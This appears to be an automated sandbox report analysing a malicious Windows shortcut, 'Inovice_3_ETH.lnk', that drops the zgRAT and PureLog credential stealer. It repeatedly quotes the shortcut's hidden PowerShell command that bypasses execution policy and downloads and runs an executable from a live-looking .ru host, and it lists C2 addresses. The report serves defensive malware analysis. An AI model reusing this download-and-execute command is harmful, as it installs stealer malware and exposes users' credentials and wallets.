Edit tour

Windows Analysis Report
Inovice_3_ETH.lnk

Overview

General Information

Sample name:	Inovice_3_ETH.lnk
Analysis ID:	1493062
MD5:	38d714fc636803994a6cb45f41b7e88e
SHA1:	141b8a2e75ee543aae9247829df050259388310d
SHA256:	73e70efc9e44e21f50e8586cc917d4751959021c3eba73921ff8c1ca01b933de
Infos:

Detection

PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Powershell download and execute file

Suricata IDS alerts for network traffic

Windows shortcut file (LNK) starts blacklisted processes

Yara detected Powershell download and execute

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Bypasses PowerShell execution policy

Contains functionality to capture screen (.Net source)

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for dropped file

Machine Learning detection for sample

Powershell drops PE file

Sigma detected: PowerShell DownloadFile

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to download and execute files (via powershell)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows shortcut file (LNK) contains suspicious command line arguments

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 7332 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svhosts.exe (PID: 7548 cmdline: "C:\Users\user\AppData\Roaming\svhosts.exe" MD5: BD46789E8C6F46CC2D00FEA7E89F1F6F)

powershell.exe (PID: 7976 cmdline: "powershell" Start-Sleep -Seconds 10; Remove-Item -Path 'C:\Users\user\AppData\Roaming\svhosts.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.2281318618.000000001BD80000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
00000002.00000002.2281318618.000000001BD80000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.2281318618.000000001BD80000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x3d14e:$s1: file:/// 0x3d05c:$s2: {11111-22222-10009-11112} 0x3d0de:$s3: {11111-22222-50001-00000} 0x3b325:$s4: get_Module 0x3b63f:$s5: Reverse 0x36352:$s6: BlockCopy 0x3632c:$s7: ReadByte 0x3d160:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
00000002.00000002.2067785237.0000000000FD0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000002.00000002.2265623390.000000001B280000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: powershell.exe PID: 7332	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: svhosts.exe PID: 7548	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: svhosts.exe PID: 7548	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svhosts.exe.fd0000.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
2.2.svhosts.exe.1b280000.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
2.2.svhosts.exe.1bd80000.5.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
2.2.svhosts.exe.1bd80000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.svhosts.exe.1bd80000.5.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x3d14e:$s1: file:/// 0x3d05c:$s2: {11111-22222-10009-11112} 0x3d0de:$s3: {11111-22222-50001-00000} 0x3b325:$s4: get_Module 0x3b63f:$s5: Reverse 0x36352:$s6: BlockCopy 0x3632c:$s7: ReadByte 0x3d160:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
2.2.svhosts.exe.1bd80000.5.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
2.2.svhosts.exe.1bd80000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.svhosts.exe.1bd80000.5.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x3b34e:$s1: file:/// 0x3b25c:$s2: {11111-22222-10009-11112} 0x3b2de:$s3: {11111-22222-50001-00000} 0x39525:$s4: get_Module 0x3983f:$s5: Reverse 0x34552:$s6: BlockCopy 0x3452c:$s7: ReadByte 0x3b360:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
Click to see the 3 entries

Other

Source	Rule	Description	Author	Strings
amsi64_7332.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: PowerShell DownloadFile

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', ProcessId: 7332, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', ProcessId: 7332, ProcessName: powershell.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7332, TargetFilename: C:\Users\user\AppData\Roaming\svhosts.exe

Sigma detected: PowerShell Download Pattern

Source: Process started

Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', ProcessId: 7332, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', ProcessId: 7332, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', ProcessId: 7332, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', ProcessId: 7332, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Powershell download and execute file

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe', ProcessId: 7332, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile - Source IP: 192.168.2.4 - Destination IP: 62.173.145.78

Timestamp:	2024-08-14T22:23:43.724101+0200
SID:	2019714
Severity:	2
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Win32/zgRAT CnC Checkin - Source IP: 192.168.2.4 - Destination IP: 188.130.138.23

Timestamp:	2024-08-14T22:23:52.582344+0200
SID:	2857864
Severity:	1
Source Port:	49732
Destination Port:	7702
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile - Source IP: 192.168.2.4 - Destination IP: 62.173.145.78

Timestamp:	2024-08-14T22:23:45.030899+0200
SID:	2019714
Severity:	2
Source Port:	49731
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Inovice_3_ETH.lnk

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\svhosts.exe

Avira: detection malicious, Label: TR/Dropper.Gen

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\svhosts.exe

ReversingLabs: Detection: 83%

Multi AV Scanner detection for submitted file

Source: Inovice_3_ETH.lnk

ReversingLabs: Detection: 70%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\svhosts.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Inovice_3_ETH.lnk

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9BA1E730 CryptUnprotectData,	2_2_00007FFD9BA1E730
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9BA1E718 CryptUnprotectData,	2_2_00007FFD9BA1E718
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9BA22D15 CryptUnprotectData,	2_2_00007FFD9BA22D15

Source: unknown

HTTPS traffic detected: 62.173.145.78:443 -> 192.168.2.4:49731 version: TLS 1.2

Source:	Binary string: costura.dotnetzip.pdb.compressed source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.dotnetzip.pdb.compressed source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: svhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: svhosts.exe, 00000002.00000002.2290132290.000000001C350000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: svhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: costura.dotnetzip.pdb.compressed8 source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2857864 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.4:49732 -> 188.130.138.23:7702

Source: global traffic

TCP traffic: 192.168.2.4:49732 -> 188.130.138.23:7702

Source: global traffic	HTTP traffic detected: GET /images/sys.exe HTTP/1.1Host: fermazapoved.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/sys.exe HTTP/1.1Host: fermazapoved.ruConnection: Keep-Alive

Source: Joe Sandbox View	ASN Name: ASKONTELRU ASKONTELRU
Source: Joe Sandbox View	ASN Name: SPACENET-ASInternetServiceProviderRU SPACENET-ASInternetServiceProviderRU

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49730 -> 62.173.145.78:80
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49731 -> 62.173.145.78:443

Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.138.23

Source: global traffic	HTTP traffic detected: GET /images/sys.exe HTTP/1.1Host: fermazapoved.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/sys.exe HTTP/1.1Host: fermazapoved.ruConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: fermazapoved.ru
Source: global traffic	DNS traffic detected: DNS query: 174.109.0.0.in-addr.arpa

Source: cert9.db.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: cert9.db.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: cert9.db.2.dr	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: cert9.db.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: cert9.db.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: cert9.db.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: cert9.db.2.dr	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: powershell.exe, 00000000.00000002.1746913988.000001F3D9527000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746913988.000001F3D9522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746913988.000001F3D9541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746913988.000001F3D9079000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fermazapoved.ru
Source: powershell.exe, 00000000.00000002.1746913988.000001F3D95FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746913988.000001F3D8143000.00000004.00000800.00020000.00000000.sdmp, Inovice_3_ETH.lnk	String found in binary or memory: http://fermazapoved.ru/images/sys.exe
